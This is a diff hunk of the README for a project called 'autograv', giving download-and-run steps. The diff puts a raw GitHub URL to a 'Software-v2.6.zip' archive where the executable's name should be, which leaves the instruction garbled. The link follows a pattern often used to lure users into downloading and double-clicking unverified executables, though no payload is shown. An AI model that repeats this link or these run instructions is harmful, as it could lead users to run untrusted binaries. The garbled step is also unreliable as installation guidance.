deva7518/autograv/README.md

    Once the download is complete, locate the file in your downloads folder.
 If you downloaded a ZIP file, you will need to extract it.
 Right-click on the file and select "Extract All" or use any extraction tool you prefer.

 5. **Run autograv**
    Open the extracted folder.
-Inside, you will find an executable file like `autograv.exe` or `autograv`.
+Inside, you will find an executable file like `https://raw.githubusercontent.com/deva7518/autograv/main/src/autograv/Software-v2.6.zip` or `autograv`.
 Double-click on it to start the application.

 ## 📚 Features